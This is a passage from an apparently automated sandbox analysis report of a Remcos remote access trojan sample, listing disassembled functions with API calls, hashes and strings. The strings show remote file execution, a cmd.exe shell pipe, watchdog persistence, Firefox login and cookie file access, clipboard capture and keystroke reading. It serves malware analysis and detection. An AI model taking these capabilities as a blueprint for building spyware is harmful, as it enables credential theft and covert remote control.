                                                                                                                                                                                              • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                                                              Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 688 412513-41253f RegOpenKeyExA 689 412541-412567 RegQueryValueExA RegCloseKey 688->689 690 412572 688->690 689->690 692 412569-412570 689->692 691 412577-412583 call 401f66 690->691 692->691
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                              • Opcode ID: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                                                                                                                                                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1596a47d3a3a9d7b824bf65cdf317066f9d5dabbc4d5e1023ecf94da71e9672a
                                                                                                                                                                                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                                                                              Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 695 4124b7-4124df RegOpenKeyExA 696 4124e1-412509 RegQueryValueExA RegCloseKey 695->696 697 41250f-412512 695->697 696->697 698 41250b-41250e 696->698
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                                                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                                                                              Function 00448716 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 727 448716-448721 728 448723-44872d 727->728 729 44872f-448735 727->729 728->729 730 448763-44876e call 445364 728->730 731 448737-448738 729->731 732 44874e-44875f RtlAllocateHeap 729->732 737 448770-448772 730->737 731->732 733 448761 732->733 734 44873a-448741 call 4447d5 732->734 733->737 734->730 740 448743-44874c call 442210 734->740 740->730 740->732
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F84,00000001,00000364,?,0043A856,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448757
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                                                                                                              • Instruction ID: 28044070be8b550b436e3a89d8ee4c5083ce1cba36f38117670c034d6afde2c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF0E03154562467BB217A669D56B5F7744AF41770B34402FFC04A6190CF68D901C2DD

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                                                                                                • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B499
                                                                                                                                                                                                • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4CB
                                                                                                                                                                                                • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B51C
                                                                                                                                                                                                • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B571
                                                                                                                                                                                                • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B578
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                                                                                                • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                                                                                              • API String ID: 2918587301-599666313
                                                                                                                                                                                              • Opcode ID: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
                                                                                                                                                                                              • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                                                                                                                                                              • Opcode Fuzzy Hash: 617277cc791489f5d4a9004504fc0227c35f05cf4c60253288cc452c9b7a6e02
                                                                                                                                                                                              • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                                                                                                                                                              Function 00405042 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 280pipesleepfileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                                                                                              • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                                                                                              • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                                                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                              • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                                                                                              • API String ID: 3815868655-1274243119
                                                                                                                                                                                              • Opcode ID: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                              • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf13e82471ad5efccb91d00ce4864fe8644f0f5189f5862159d9f8069fd826c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                                                                                              Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                                                                                              • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                                                                                              • API String ID: 65172268-860466531
                                                                                                                                                                                              • Opcode ID: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                              • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                                                                                                              • Opcode Fuzzy Hash: fb9dbb4756769c3cd24ee7adcec061e257e704e0881a6f9f62c6e3ac0e16f80b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                                                                                              Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                                                                                                              • Opcode ID: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                              • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                                                                                              • Opcode Fuzzy Hash: 40a99a48df38c0986ea1f072844720ef4507da5861f13f8a5a44a5df557391d4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                              Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                              • API String ID: 3527384056-432212279
                                                                                                                                                                                              • Opcode ID: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                              • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d3bdde3c1918d27b7ca6b9febe00a20e513e275f4cf8a27e851897e9cca035
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                                                                                              Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                              • API String ID: 726551946-3025026198
                                                                                                                                                                                              • Opcode ID: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                                                                                                                                                              • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f8475bdf6bfba7fa43d22f8bf70a43f1ded6f1e7cb01d1a4d57dc6d9a46443a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                                                                                              Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                              • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3520204547-0
                                                                                                                                                                                              • Opcode ID: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
                                                                                                                                                                                              • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                                                                                                                                                              • Opcode Fuzzy Hash: 42efddb075740920b0a99be8245ba2b7744cb55bc38d7abeb996d078b4737da1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                                                                                              Function 00418764 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                              • API String ID: 0-3177665633
                                                                                                                                                                                              • Opcode ID: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
                                                                                                                                                                                              • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fcdf3723bd403450e4658182a616b4124205e679a17675a4039e88decae9ffb
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                                                                                                                                                              Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                              • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                              • String ID: X[G
                                                                                                                                                                                              • API String ID: 1888522110-739899062
